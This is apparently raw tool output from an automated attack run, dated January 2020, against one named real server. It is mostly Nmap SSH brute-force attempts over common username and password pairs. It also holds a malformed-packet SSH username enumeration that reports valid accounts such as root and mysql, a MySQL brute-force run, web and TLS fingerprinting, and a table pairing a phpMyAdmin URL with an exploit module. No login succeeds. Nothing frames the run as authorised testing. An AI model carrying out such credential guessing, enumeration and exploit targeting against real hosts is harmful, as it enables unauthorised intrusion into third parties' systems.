1984NSE: [ssh-brute] Trying username/password pair: netadmin:jessica
1985NSE: [ssh-brute] Trying username/password pair: guest:jessica
1986NSE: [ssh-brute] Trying username/password pair: user:jessica
1987NSE: [ssh-brute] Trying username/password pair: web:jessica
1988NSE: [ssh-brute] Trying username/password pair: test:jessica
1989NSE: [ssh-brute] Trying username/password pair: root:111111
1990NSE: [ssh-brute] Trying username/password pair: admin:111111
1991NSE: [ssh-brute] Trying username/password pair: administrator:111111
1992NSE: [ssh-brute] Trying username/password pair: webadmin:111111
1993NSE: [ssh-brute] Trying username/password pair: sysadmin:111111
1994NSE: [ssh-brute] Trying username/password pair: netadmin:111111
1995NSE: [ssh-brute] Trying username/password pair: guest:111111
1996NSE: [ssh-brute] Trying username/password pair: user:111111
1997NSE: [ssh-brute] Trying username/password pair: web:111111
1998NSE: [ssh-brute] Trying username/password pair: test:111111
1999NSE: [ssh-brute] Trying username/password pair: root:ashley
2000NSE: [ssh-brute] Trying username/password pair: admin:ashley
2001NSE: [ssh-brute] Trying username/password pair: administrator:ashley
2002NSE: [ssh-brute] Trying username/password pair: webadmin:ashley
2003NSE: [ssh-brute] Trying username/password pair: sysadmin:ashley
2004NSE: [ssh-brute] Trying username/password pair: netadmin:ashley
2005NSE: [ssh-brute] Trying username/password pair: guest:ashley
2006NSE: [ssh-brute] Trying username/password pair: user:ashley
2007NSE: [ssh-brute] Trying username/password pair: web:ashley
2008NSE: [ssh-brute] Trying username/password pair: test:ashley
2009NSE: [ssh-brute] Trying username/password pair: root:000000
2010NSE: [ssh-brute] Trying username/password pair: admin:000000
2011NSE: [ssh-brute] Trying username/password pair: administrator:000000
2012NSE: [ssh-brute] Trying username/password pair: webadmin:000000
2013NSE: [ssh-brute] Trying username/password pair: sysadmin:000000
2014NSE: [ssh-brute] Trying username/password pair: netadmin:000000
2015NSE: [ssh-brute] Trying username/password pair: guest:000000
2016NSE: [ssh-brute] Trying username/password pair: user:000000
2017NSE: [ssh-brute] Trying username/password pair: web:000000
2018NSE: [ssh-brute] Trying username/password pair: test:000000
2019NSE: [ssh-brute] Trying username/password pair: root:iloveu
2020NSE: [ssh-brute] Trying username/password pair: admin:iloveu
2021NSE: [ssh-brute] Trying username/password pair: administrator:iloveu
2022NSE: [ssh-brute] Trying username/password pair: webadmin:iloveu
2023NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveu
2024NSE: [ssh-brute] Trying username/password pair: netadmin:iloveu
2025NSE: [ssh-brute] Trying username/password pair: guest:iloveu
2026NSE: [ssh-brute] Trying username/password pair: user:iloveu
2027NSE: [ssh-brute] Trying username/password pair: web:iloveu
2028NSE: [ssh-brute] Trying username/password pair: test:iloveu
2029NSE: [ssh-brute] Trying username/password pair: root:michelle
2030NSE: [ssh-brute] Trying username/password pair: admin:michelle
2031NSE: [ssh-brute] Trying username/password pair: administrator:michelle
2032NSE: [ssh-brute] Trying username/password pair: webadmin:michelle
2033NSE: [ssh-brute] Trying username/password pair: sysadmin:michelle
2034NSE: [ssh-brute] Trying username/password pair: netadmin:michelle
2035NSE: [ssh-brute] Trying username/password pair: guest:michelle
2036NSE: [ssh-brute] Trying username/password pair: user:michelle
2037NSE: [ssh-brute] Trying username/password pair: web:michelle
2038NSE: [ssh-brute] Trying username/password pair: test:michelle
2039NSE: [ssh-brute] Trying username/password pair: root:tigger
2040NSE: [ssh-brute] Trying username/password pair: admin:tigger
2041NSE: [ssh-brute] Trying username/password pair: administrator:tigger
2042NSE: [ssh-brute] Trying username/password pair: webadmin:tigger
2043NSE: [ssh-brute] Trying username/password pair: sysadmin:tigger
2044NSE: [ssh-brute] Trying username/password pair: netadmin:tigger
2045NSE: [ssh-brute] Trying username/password pair: guest:tigger
2046NSE: [ssh-brute] Trying username/password pair: user:tigger
2047NSE: [ssh-brute] Trying username/password pair: web:tigger
2048NSE: [ssh-brute] Trying username/password pair: test:tigger
2049NSE: [ssh-brute] Trying username/password pair: root:sunshine
2050NSE: [ssh-brute] Trying username/password pair: admin:sunshine
2051NSE: [ssh-brute] Trying username/password pair: administrator:sunshine
2052NSE: [ssh-brute] Trying username/password pair: webadmin:sunshine
2053NSE: [ssh-brute] Trying username/password pair: sysadmin:sunshine
2054NSE: [ssh-brute] Trying username/password pair: netadmin:sunshine
2055NSE: [ssh-brute] Trying username/password pair: guest:sunshine
2056NSE: [ssh-brute] Trying username/password pair: user:sunshine
2057NSE: [ssh-brute] Trying username/password pair: web:sunshine
2058NSE: [ssh-brute] Trying username/password pair: test:sunshine
2059NSE: [ssh-brute] Trying username/password pair: root:chocolate
2060NSE: [ssh-brute] Trying username/password pair: admin:chocolate
2061NSE: [ssh-brute] Trying username/password pair: administrator:chocolate
2062NSE: [ssh-brute] Trying username/password pair: webadmin:chocolate
2063NSE: [ssh-brute] Trying username/password pair: sysadmin:chocolate
2064NSE: [ssh-brute] Trying username/password pair: netadmin:chocolate
2065NSE: [ssh-brute] Trying username/password pair: guest:chocolate
2066NSE: [ssh-brute] Trying username/password pair: user:chocolate
2067NSE: [ssh-brute] Trying username/password pair: web:chocolate
2068NSE: [ssh-brute] Trying username/password pair: test:chocolate
2069NSE: [ssh-brute] Trying username/password pair: root:password1
2070NSE: [ssh-brute] Trying username/password pair: admin:password1
2071NSE: [ssh-brute] Trying username/password pair: administrator:password1
2072NSE: [ssh-brute] Trying username/password pair: webadmin:password1
2073NSE: [ssh-brute] Trying username/password pair: sysadmin:password1
2074NSE: [ssh-brute] Trying username/password pair: netadmin:password1
2075NSE: [ssh-brute] Trying username/password pair: guest:password1
2076NSE: [ssh-brute] Trying username/password pair: user:password1
2077NSE: [ssh-brute] Trying username/password pair: web:password1
2078NSE: [ssh-brute] Trying username/password pair: test:password1
2079NSE: [ssh-brute] Trying username/password pair: root:soccer
2080NSE: [ssh-brute] Trying username/password pair: admin:soccer
2081NSE: [ssh-brute] Trying username/password pair: administrator:soccer
2082NSE: [ssh-brute] Trying username/password pair: webadmin:soccer
2083NSE: [ssh-brute] Trying username/password pair: sysadmin:soccer
2084NSE: [ssh-brute] Trying username/password pair: netadmin:soccer
2085NSE: [ssh-brute] Trying username/password pair: guest:soccer
2086NSE: [ssh-brute] Trying username/password pair: user:soccer
2087NSE: [ssh-brute] Trying username/password pair: web:soccer
2088NSE: [ssh-brute] Trying username/password pair: test:soccer
2089NSE: [ssh-brute] Trying username/password pair: root:anthony
2090NSE: [ssh-brute] Trying username/password pair: admin:anthony
2091NSE: [ssh-brute] Trying username/password pair: administrator:anthony
2092NSE: [ssh-brute] Trying username/password pair: webadmin:anthony
2093NSE: [ssh-brute] Trying username/password pair: sysadmin:anthony
2094NSE: [ssh-brute] Trying username/password pair: netadmin:anthony
2095NSE: [ssh-brute] Trying username/password pair: guest:anthony
2096NSE: [ssh-brute] Trying username/password pair: user:anthony
2097NSE: [ssh-brute] Trying username/password pair: web:anthony
2098NSE: [ssh-brute] Trying username/password pair: test:anthony
2099NSE: [ssh-brute] Trying username/password pair: root:friends
2100NSE: [ssh-brute] Trying username/password pair: admin:friends
2101NSE: [ssh-brute] Trying username/password pair: administrator:friends
2102NSE: [ssh-brute] Trying username/password pair: webadmin:friends
2103NSE: [ssh-brute] Trying username/password pair: sysadmin:friends
2104NSE: [ssh-brute] Trying username/password pair: netadmin:friends
2105NSE: [ssh-brute] Trying username/password pair: guest:friends
2106NSE: [ssh-brute] Trying username/password pair: user:friends
2107NSE: [ssh-brute] Trying username/password pair: web:friends
2108NSE: [ssh-brute] Trying username/password pair: test:friends
2109NSE: [ssh-brute] Trying username/password pair: root:purple
2110NSE: [ssh-brute] Trying username/password pair: admin:purple
2111NSE: [ssh-brute] Trying username/password pair: administrator:purple
2112NSE: [ssh-brute] Trying username/password pair: webadmin:purple
2113NSE: [ssh-brute] Trying username/password pair: sysadmin:purple
2114NSE: [ssh-brute] Trying username/password pair: netadmin:purple
2115NSE: [ssh-brute] Trying username/password pair: guest:purple
2116NSE: [ssh-brute] Trying username/password pair: user:purple
2117NSE: [ssh-brute] Trying username/password pair: web:purple
2118NSE: [ssh-brute] Trying username/password pair: test:purple
2119NSE: [ssh-brute] Trying username/password pair: root:angel
2120NSE: [ssh-brute] Trying username/password pair: admin:angel
2121NSE: [ssh-brute] Trying username/password pair: administrator:angel
2122NSE: [ssh-brute] Trying username/password pair: webadmin:angel
2123NSE: [ssh-brute] Trying username/password pair: sysadmin:angel
2124NSE: [ssh-brute] Trying username/password pair: netadmin:angel
2125NSE: [ssh-brute] Trying username/password pair: guest:angel
2126NSE: [ssh-brute] Trying username/password pair: user:angel
2127NSE: [ssh-brute] Trying username/password pair: web:angel
2128NSE: [ssh-brute] Trying username/password pair: test:angel
2129NSE: [ssh-brute] Trying username/password pair: root:butterfly
2130NSE: [ssh-brute] Trying username/password pair: admin:butterfly
2131NSE: [ssh-brute] Trying username/password pair: administrator:butterfly
2132NSE: [ssh-brute] Trying username/password pair: webadmin:butterfly
2133NSE: [ssh-brute] Trying username/password pair: sysadmin:butterfly
2134NSE: [ssh-brute] Trying username/password pair: netadmin:butterfly
2135NSE: [ssh-brute] Trying username/password pair: guest:butterfly
2136NSE: [ssh-brute] Trying username/password pair: user:butterfly
2137NSE: [ssh-brute] Trying username/password pair: web:butterfly
2138NSE: [ssh-brute] Trying username/password pair: test:butterfly
2139NSE: [ssh-brute] Trying username/password pair: root:jordan
2140NSE: [ssh-brute] Trying username/password pair: admin:jordan
2141NSE: [ssh-brute] Trying username/password pair: administrator:jordan
2142NSE: [ssh-brute] Trying username/password pair: webadmin:jordan
2143NSE: [ssh-brute] Trying username/password pair: sysadmin:jordan
2144NSE: [ssh-brute] Trying username/password pair: netadmin:jordan
2145NSE: [ssh-brute] Trying username/password pair: guest:jordan
2146NSE: [ssh-brute] Trying username/password pair: user:jordan
2147NSE: [ssh-brute] Trying username/password pair: web:jordan
2148NSE: [ssh-brute] Trying username/password pair: test:jordan
2149NSE: [ssh-brute] Trying username/password pair: root:fuckyou
2150NSE: [ssh-brute] Trying username/password pair: admin:fuckyou
2151NSE: [ssh-brute] Trying username/password pair: administrator:fuckyou
2152NSE: [ssh-brute] Trying username/password pair: webadmin:fuckyou
2153NSE: [ssh-brute] Trying username/password pair: sysadmin:fuckyou
2154NSE: [ssh-brute] Trying username/password pair: netadmin:fuckyou
2155NSE: [ssh-brute] Trying username/password pair: guest:fuckyou
2156NSE: [ssh-brute] Trying username/password pair: user:fuckyou
2157NSE: [ssh-brute] Trying username/password pair: web:fuckyou
2158NSE: [ssh-brute] Trying username/password pair: test:fuckyou
2159NSE: [ssh-brute] Trying username/password pair: root:123123
2160NSE: [ssh-brute] Trying username/password pair: admin:123123
2161NSE: [ssh-brute] Trying username/password pair: administrator:123123
2162NSE: [ssh-brute] Trying username/password pair: webadmin:123123
2163NSE: [ssh-brute] Trying username/password pair: sysadmin:123123
2164NSE: [ssh-brute] Trying username/password pair: netadmin:123123
2165NSE: [ssh-brute] Trying username/password pair: guest:123123
2166NSE: [ssh-brute] Trying username/password pair: user:123123
NSE: [ssh-brute] usernames: Time limit 3m00s exceeded.
NSE: [ssh-brute] usernames: Time limit 3m00s exceeded.
NSE: [ssh-brute] passwords: Time limit 3m00s exceeded.
Nmap scan report for s18161039.onlinehome-server.info (217.160.131.142)
Host is up (0.16s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
| ssh-auth-methods:
| Supported authentication methods:
| publickey
| gssapi-keyex
| gssapi-with-mic
|_ password
| ssh-brute:
| Accounts: No valid accounts found
|_ Statistics: Performed 378 guesses in 180 seconds, average tps: 2.5
| ssh-hostkey:
| 1024 a8:a9:da:bc:cb:8d:0b:ee:5c:06:94:59:e9:e1:9e:6e (DSA)
|_ 2048 95:1e:62:e2:8f:bb:20:92:a7:f4:ab:a7:44:f6:37:f0 (RSA)
| ssh-publickey-acceptance:
|_ Accepted Public Keys: No public keys accepted
|_ssh-run: Failed to specify credentials and command to run.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.32 (95%), Linux 3.10 (94%), MikroTik RouterOS 6.32.1 (92%), Linux 3.5 (92%), Linux 3.8 (92%), Linux 2.6.32 - 3.10 (91%), Linux 2.6.32 - 3.13 (91%), Linux 2.6.32 - 3.9 (91%), Linux 3.2 (91%), Linux 2.6.32 - 3.1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 16 hops

TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 53.78 ms 10.246.204.1
2 127.73 ms 104.245.145.177
3 127.81 ms te0-1-1-9.219.ccr32.yyz02.atlas.cogentco.com (38.104.158.113)
4 127.79 ms toro-b1-link.telia.net (62.115.168.48)
5 127.85 ms te0-9-1-9.ccr31.yyz02.atlas.cogentco.com (154.54.43.161)
6 47.47 ms nyk-bb2-link.telia.net (62.115.113.86)
7 155.87 ms ldn-bb3-link.telia.net (62.115.113.21)
8 155.90 ms tinet-up.bb-a.fra3.fra.de.oneandone.net (213.200.65.202)
9 155.95 ms ae-10-0.bb-a.bap.rhr.de.oneandone.net (212.227.120.147)
10 155.93 ms ae-1.gw-distp-a.kw.nbz.fr.oneandone.net (195.20.243.3)
11 155.95 ms ionos-ic-350360-ffm-b1.c.telia.net (62.115.181.11)
12 185.62 ms ae-9.bb-b.bs.kae.de.oneandone.net (212.227.120.168)
13 185.66 ms ae-2.gw-distp-a.kw.nbz.fr.oneandone.net (195.20.243.35)
14 185.68 ms ae-1.gw-prtr-a0110-a.kw.nbz.fr.oneandone.net (195.20.243.81)
15 ...
16 126.39 ms s18161039.onlinehome-server.info (217.160.131.142)
####################################################################################################################################
USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
RHOSTS => 217.160.131.142
RHOST => 217.160.131.142
[*] 217.160.131.142:22 - SSH - Using malformed packet technique
[*] 217.160.131.142:22 - SSH - Starting scan
[-] 217.160.131.142:22 - SSH - User 'admin' not found
[-] 217.160.131.142:22 - SSH - User 'administrator' not found
[-] 217.160.131.142:22 - SSH - User 'anonymous' not found
[-] 217.160.131.142:22 - SSH - User 'backup' not found
[-] 217.160.131.142:22 - SSH - User 'bee' not found
[+] 217.160.131.142:22 - SSH - User 'ftp' found
[-] 217.160.131.142:22 - SSH - User 'guest' not found
[-] 217.160.131.142:22 - SSH - User 'GUEST' not found
[-] 217.160.131.142:22 - SSH - User 'info' not found
[+] 217.160.131.142:22 - SSH - User 'mail' found
[-] 217.160.131.142:22 - SSH - User 'mailadmin' not found
[-] 217.160.131.142:22 - SSH - User 'msfadmin' not found
[+] 217.160.131.142:22 - SSH - User 'mysql' found
[+] 217.160.131.142:22 - SSH - User 'nobody' found
[-] 217.160.131.142:22 - SSH - User 'oracle' not found
[-] 217.160.131.142:22 - SSH - User 'owaspbwa' not found
[-] 217.160.131.142:22 - SSH - User 'postfix' not found
[-] 217.160.131.142:22 - SSH - User 'postgres' not found
[-] 217.160.131.142:22 - SSH - User 'private' not found
[-] 217.160.131.142:22 - SSH - User 'proftpd' not found
[-] 217.160.131.142:22 - SSH - User 'public' not found
[+] 217.160.131.142:22 - SSH - User 'root' found
[-] 217.160.131.142:22 - SSH - User 'superadmin' not found
[-] 217.160.131.142:22 - SSH - User 'support' not found
[-] 217.160.131.142:22 - SSH - User 'sys' not found
[-] 217.160.131.142:22 - SSH - User 'system' not found
[-] 217.160.131.142:22 - SSH - User 'systemadmin' not found
[-] 217.160.131.142:22 - SSH - User 'systemadministrator' not found
[-] 217.160.131.142:22 - SSH - User 'test' not found
[-] 217.160.131.142:22 - SSH - User 'tomcat' not found
[-] 217.160.131.142:22 - SSH - User 'user' not found
[-] 217.160.131.142:22 - SSH - User 'webmaster' not found
[-] 217.160.131.142:22 - SSH - User 'www-data' not found
[-] 217.160.131.142:22 - SSH - User 'Fortimanager_Access' not found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
####################################################################################################################################
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-05 03:29 EST
Nmap scan report for s18161039.onlinehome-server.info (217.160.131.142)
Host is up (0.15s latency).

PORT STATE SERVICE VERSION
67/tcp closed dhcps
67/udp closed dhcps
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: power-device|router
Running: Fronius embedded, MikroTik RouterOS 6.X
OS CPE: cpe:/h:fronius:datalogger_web cpe:/o:mikrotik:routeros:6.32.1
OS details: Fronius Datalogger Web, MikroTik RouterOS 6.32.1
Network Distance: 13 hops

TRACEROUTE (using port 67/tcp)
HOP RTT ADDRESS
1 104.21 ms 10.246.204.1
2 104.25 ms 104.245.145.177
3 104.31 ms te0-0-2-1.225.nr11.b010988-1.yyz02.atlas.cogentco.com (38.104.156.9)
4 104.29 ms toro-b1-link.telia.net (62.115.168.48)
5 104.33 ms toro-b3-link.telia.net (62.115.116.180)
6 62.48 ms nyk-bb2-link.telia.net (62.115.113.86)
7 154.57 ms ldn-bb3-link.telia.net (62.115.113.21)
8 154.59 ms prs-bb3-link.telia.net (62.115.134.92)
9 193.79 ms ffm-bb3-link.telia.net (62.115.123.12)
10 193.82 ms ffm-b1-link.telia.net (62.115.141.237)
11 154.62 ms ae-1.gw-prtr-a0110-a.kw.nbz.fr.oneandone.net (195.20.243.81)
12 ...
13 154.64 ms s18161039.onlinehome-server.info (217.160.131.142)
###################################################################################################################################
http://217.160.131.142 [200 OK] Apache, Country[GERMANY][DE], HTML5, HTTPServer[Apache], IP[217.160.131.142], Plesk[Lin], Title[Default Parallels Plesk Page], X-Powered-By[PleskLin], X-UA-Compatible[IE=edge]
###################################################################################################################################

wig - WebApp Information Gatherer


Scanning http://217.160.131.142...
___________________________________________ SITE INFO ___________________________________________
IP Title
217.160.131.142 Default Parallels Plesk Page

____________________________________________ VERSION ____________________________________________
Name Versions Type
Apache 2.2.11 | 2.2.12 | 2.2.13 | 2.2.14 | 2.2.15 | 2.2.16 | 2.2.17 Platform
       2.2.18 | 2.2.19 | 2.2.20 | 2.2.21 | 2.2.22 | 2.2.23 | 2.2.24
       2.2.25 | 2.2.26 | 2.2.27 | 2.2.28 | 2.2.29 | 2.3.0 | 2.3.1
       2.3.10 | 2.3.11 | 2.3.12 | 2.3.13 | 2.3.14 | 2.3.15 | 2.3.16
       2.3.2 | 2.3.3 | 2.3.4 | 2.3.5 | 2.3.6 | 2.3.7 | 2.3.8
       2.3.9 | 2.4.0 | 2.4.1 | 2.4.2 | 2.4.3

_________________________________________________________________________________________________
Time: 38.6 sec Urls: 816 Fingerprints: 40401
##################################################################################################################################
HTTP/1.1 200 OK
Date: Sun, 05 Jan 2020 08:30:03 GMT
Server: Apache
Last-Modified: Tue, 30 Jan 2018 10:06:23 GMT
ETag: "b00227-1b79-563fb83d0e5c0"
Accept-Ranges: bytes
Content-Length: 7033
X-Powered-By: PleskLin
Connection: close
Content-Type: text/html

HTTP/1.1 200 OK
Date: Sun, 05 Jan 2020 08:30:04 GMT
Server: Apache
Last-Modified: Tue, 30 Jan 2018 10:06:23 GMT
ETag: "b00227-1b79-563fb83d0e5c0"
Accept-Ranges: bytes
Content-Length: 7033
X-Powered-By: PleskLin
Connection: close
Content-Type: text/html
####################################################################################################################################
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-05 03:30 EST
Nmap scan report for s18161039.onlinehome-server.info (217.160.131.142)
Host is up (0.14s latency).

PORT STATE SERVICE VERSION
123/tcp closed ntp
123/udp closed ntp
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: power-device|router
Running: Fronius embedded, MikroTik RouterOS 6.X
OS CPE: cpe:/h:fronius:datalogger_web cpe:/o:mikrotik:routeros:6.32.1
OS details: Fronius Datalogger Web, MikroTik RouterOS 6.32.1
Network Distance: 13 hops

TRACEROUTE (using port 123/tcp)
HOP RTT ADDRESS
1 59.98 ms 10.246.204.1
2 91.06 ms 104.245.145.177
3 91.10 ms te0-0-2-1.225.nr11.b010988-1.yyz02.atlas.cogentco.com (38.104.156.9)
4 91.07 ms toro-b1-link.telia.net (62.115.168.48)
5 91.16 ms toro-b3-link.telia.net (62.115.116.180)
6 56.62 ms tinet.yyz02.atlas.cogentco.com (154.54.9.2)
7 188.03 ms et-0-0-71.cr2-fra2.ip4.gtt.net (141.136.110.50)
8 157.79 ms tinet-up.bb-a.fra3.fra.de.oneandone.net (213.200.65.202)
9 158.04 ms ffm-bb3-link.telia.net (62.115.123.12)
10 157.92 ms ae-1.gw-distp-a.kw.nbz.fr.oneandone.net (195.20.243.3)
11 157.90 ms ae-1.gw-prtr-a0110-a.kw.nbz.fr.oneandone.net (195.20.243.81)
12 ...
13 158.02 ms s18161039.onlinehome-server.info (217.160.131.142)
###################################################################################################################################
2361https://217.160.131.142/ [200 OK] Apache, Country[GERMANY][DE], HTML5, HTTPServer[Apache], IP[217.160.131.142], Plesk[Lin], Title[Default Parallels Plesk Page], X-Powered-By[PleskLin], X-UA-Compatible[IE=edge]
2362####################################################################################################################################
2363Version: 1.11.13-static
2364OpenSSL 1.0.2-chacha (1.0.2g-dev)
2365
2366Connected to 217.160.131.142
2367
2368Testing SSL server 217.160.131.142 on port 443 using SNI name 217.160.131.142
2369
2370 TLS Fallback SCSV:
2371Server supports TLS Fallback SCSV
2372
2373 TLS renegotiation:
2374Secure session renegotiation supported
2375
2376 TLS Compression:
2377Compression disabled
2378
2379 Heartbleed:
2380TLS 1.2 not vulnerable to heartbleed
2381TLS 1.1 not vulnerable to heartbleed
2382TLS 1.0 not vulnerable to heartbleed
2383
2384 Supported Server Cipher(s):
2385Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
2386Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
2387Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
2388Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
2389Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
2390Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
2391Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
2392Accepted TLSv1.2 256 bits AES256-GCM-SHA384
2393Accepted TLSv1.2 256 bits AES256-SHA256
2394Accepted TLSv1.2 256 bits AES256-SHA
2395Accepted TLSv1.2 256 bits CAMELLIA256-SHA
2396Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
2397Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
2398Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
2399Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
2400Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
2401Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
2402Accepted TLSv1.2 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
2403Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
2404Accepted TLSv1.2 112 bits EDH-RSA-DES-CBC3-SHA DHE 2048 bits
2405Accepted TLSv1.2 128 bits AES128-GCM-SHA256
2406Accepted TLSv1.2 128 bits AES128-SHA256
2407Accepted TLSv1.2 128 bits AES128-SHA
2408Accepted TLSv1.2 128 bits CAMELLIA128-SHA
2409Accepted TLSv1.2 112 bits DES-CBC3-SHA
2410Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
2411Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
2412Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
2413Accepted TLSv1.1 256 bits AES256-SHA
2414Accepted TLSv1.1 256 bits CAMELLIA256-SHA
2415Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
2416Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
2417Accepted TLSv1.1 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
2418Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
2419Accepted TLSv1.1 112 bits EDH-RSA-DES-CBC3-SHA DHE 2048 bits
2420Accepted TLSv1.1 128 bits AES128-SHA
2421Accepted TLSv1.1 128 bits CAMELLIA128-SHA
2422Accepted TLSv1.1 112 bits DES-CBC3-SHA
2423Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
2424Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
2425Accepted TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
2426Accepted TLSv1.0 256 bits AES256-SHA
2427Accepted TLSv1.0 256 bits CAMELLIA256-SHA
2428Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
2429Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
2430Accepted TLSv1.0 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
2431Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
2432Accepted TLSv1.0 112 bits EDH-RSA-DES-CBC3-SHA DHE 2048 bits
2433Accepted TLSv1.0 128 bits AES128-SHA
2434Accepted TLSv1.0 128 bits CAMELLIA128-SHA
2435Accepted TLSv1.0 112 bits DES-CBC3-SHA
2436
2437 SSL Certificate:
2438Signature Algorithm: sha1WithRSAEncryption
2439RSA Key Strength: 2048
2440
2441Subject: Parallels Panel
2442Issuer: Parallels Panel
2443
2444Not valid before: Jan 27 11:06:14 2015 GMT
2445Not valid after: Jan 27 11:06:14 2016 GMT
2446###################################################################################################################################
2447Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-05 03:31 EST
2448NSE: [mysql-brute] usernames: Time limit 3m00s exceeded.
2449NSE: [mysql-brute] usernames: Time limit 3m00s exceeded.
2450NSE: [mysql-brute] passwords: Time limit 3m00s exceeded.
2451Nmap scan report for s18161039.onlinehome-server.info (217.160.131.142)
2452Host is up (0.16s latency).
2453
2454PORT STATE SERVICE VERSION
24553306/tcp open mysql MySQL 5.1.73
2456| mysql-brute:
2457| Accounts: No valid accounts found
2458|_ Statistics: Performed 6719 guesses in 180 seconds, average tps: 37.0
2459| mysql-enum:
2460| Accounts: No valid accounts found
2461|_ Statistics: Performed 10 guesses in 1 seconds, average tps: 10.0
2462| mysql-info:
2463| Protocol: 10
2464| Version: 5.1.73
2465| Thread ID: 565102
2466| Capabilities flags: 63487
2467| Some Capabilities: SupportsTransactions, Support41Auth, Speaks41ProtocolNew, Speaks41ProtocolOld, FoundRows, IgnoreSigpipes, LongPassword, SupportsLoadDataLocal, ConnectWithDatabase, IgnoreSpaceBeforeParenthesis, InteractiveClient, SupportsCompression, DontAllowDatabaseTableColumn, ODBCClient, LongColumnFlag
2468| Status: Autocommit
2469|_ Salt: dlrv|+_~zi$o'o~K=-gD
2470Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
2471Aggressive OS guesses: Linux 2.6.32 (95%), Linux 3.8 (95%), Linux 2.6.32 - 3.10 (95%), Linux 2.6.32 - 3.13 (95%), Linux 2.6.32 - 3.9 (95%), Linux 3.2 (95%), Linux 2.6.32 - 3.1 (94%), Linux 3.1 (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 2.6.32 - 2.6.39 (94%)
2472No exact OS matches for host (test conditions non-ideal).
2473Network Distance: 13 hops
2474
2475TRACEROUTE (using port 3306/tcp)
2476HOP RTT ADDRESS
24771 83.49 ms 10.246.204.1
24782 83.82 ms 104.245.145.177
24793 84.57 ms te0-1-1-9.219.ccr32.yyz02.atlas.cogentco.com (38.104.158.113)
24804 54.66 ms te0-0-0-1.agr13.yyz02.atlas.cogentco.com (154.24.54.37)
24815 64.56 ms te0-9-0-9.ccr31.yyz02.atlas.cogentco.com (154.54.43.141)
24826 94.75 ms tinet.yyz02.atlas.cogentco.com (154.54.9.2)
24837 155.53 ms et-0-0-71.cr2-fra2.ip4.gtt.net (141.136.110.50)
24848 155.55 ms prs-bb3-link.telia.net (62.115.134.92)
24859 185.96 ms ffm-bb3-link.telia.net (62.115.123.12)
248610 186.00 ms ffm-b1-link.telia.net (62.115.121.5)
248711 185.90 ms ae-1.gw-prtr-a0110-a.kw.nbz.fr.oneandone.net (195.20.243.81)
248812 186.00 ms ae-9.bb-b.bs.kae.de.oneandone.net (212.227.120.168)
248913 185.93 ms s18161039.onlinehome-server.info (217.160.131.142)
2490#################################################################################################################################
2491+------------+------------------------------------------+--------------------------------------------------+----------+----------+
2492| App Name | URL to Application | Potential Exploit | Username | Password |
2493+------------+------------------------------------------+--------------------------------------------------+----------+----------+
2494| phpMyAdmin | https://217.160.131.142:8443/phpmyadmin/ | ./exploits/multi/http/phpmyadmin_preg_replace.rb | None | None |
2495+------------+------------------------------------------+--------------------------------------------------+----------+----------+
2496###################################################################################################################################
2497Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-05 03:44 EST
2498Warning: 217.160.131.142 giving up on port because retransmission cap hit (2).
2499Nmap scan report for s18161039.onlinehome-server.info (217.160.131.142)
2500Host is up (0.15s latency).
2501Not shown: 65527 closed ports
2502PORT STATE SERVICE VERSION
250321/tcp open ftp ProFTPD
2504| ssl-cert: Subject: commonName=Parallels Panel/organizationName=Parallels/stateOrProvinceName=Virginia/countryName=US
2505| Not valid before: 2015-01-27T11:06:14
